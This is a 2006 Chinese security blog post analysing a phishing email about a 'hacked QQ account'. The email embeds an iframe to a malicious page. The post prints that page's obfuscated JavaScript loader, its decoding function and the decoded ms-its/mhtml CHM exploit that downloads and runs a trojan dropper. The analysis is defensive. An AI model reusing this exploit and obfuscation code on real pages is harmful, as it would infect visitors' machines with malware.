endurer原创
2006-04-04第1版
今天收到一封带毒邮件。这封带毒邮件与2005年末收的的带毒邮件(可参考:收到带病毒的电子邮件.... )相似,但有所翻新。
主题:最近好吗?怎么联系不上你
发件人: "zxc338855" zxc338855@163.com
邮件内容为:
老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了 老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了
邮件体中其中用<IFRAME>引入了下载病毒的网页hxxp://2008.***e2.7868.net/service/bj/a.htm。
hxxp://2008.***e2.7868.net/service/bj/a.htm的内容为:
<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=TDSJQU>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p","oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb","mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po","dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&","4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn","quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb","nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf","&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34","21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8","Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd","sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&","1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs","juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb","ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38","b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo","u/xsjuf)voftdbqf)Xpset**=0TDSJQU> "];
function psw(st){
var varS;
varS="";
var i;
for(var a=0;a<st.length;a++){
i = st.charCodeAt(a);
if (i==1)
varS=varS+String.fromCharCode('"'.charCodeAt()-1);
else if (i==2) {
a++;
varS+=String.fromCharCode(st.charCodeAt(a));
}
else
varS+=String.fromCharCode(i-1);
}
return varS;
};
var num=16;
function S(){
for(i=0;i<num;i++)
document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>
用了一个自定义的加密函数来加密。
解密后的代码为:
<SCRIPT>var Words="%3Cbody oncontextmenu%3D%22return false%22 ondragstart%3D%22return false%22 onselectstart %3D%22return false%22 onselect%3D%22document%2Eselection%2Eempty%28%29%22 oncopy%3D%22document%2Eselection%2Eempty%28%29%22 onbeforecopy%3D%22return false%22 onmouseup%3D%22document%2Eselection%2Eempty%28%29%22%3E%3Cnoscript%3E%3Ciframe src%3D%2A%3E%3C%2Fiframe%3E%3C%2Fnoscript%3E%0D%0A%3Ctextarea id%3D%22code%22 style%3D%22display%3Anone%3B%22%3E%0D%0A%3Cobject data%3D%22%26%23109%3Bs%2Dits%3Amhtml%3Afile%3A%2F%2Fc%3A%5Cfoo%2Emht%21%24%7Bpath%7D%2Fa%2Echm%3A%3A%2Fa%2Ehtm%22 type%3D%22text%2Fx%2Dscriptlet%22%3E%0D%0A%3C%2Fobject%3E%0D%0A%3C%2Ftextarea%3E%0D%0A%3Cscript language%3D%22javascript%22%3E%0D%0Adocument%2Ewrite%28code%2Evalue%2Ereplace%28%2F%5C%24%7Bpath%7D%2Fg%2Clocation%2Ehref%2Esubstring%280%2Clocation%2Ehref%2EindexOf%28%27a%2Ehtm%27%29%29%29%29%3B%0D%0A%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
unescape后的代码为:
<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">
</object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));
</script>
该网页会下载、运行a.chm。
a.chm会释放/运行a.htm和a.exe,Kaspersky报为Exploit.HTML.CodeBaseExec和Trojan-Dropper.Win32.Pakes,瑞星报为Exploit.HTML.CodeExec和Trojan.PcGhost.c。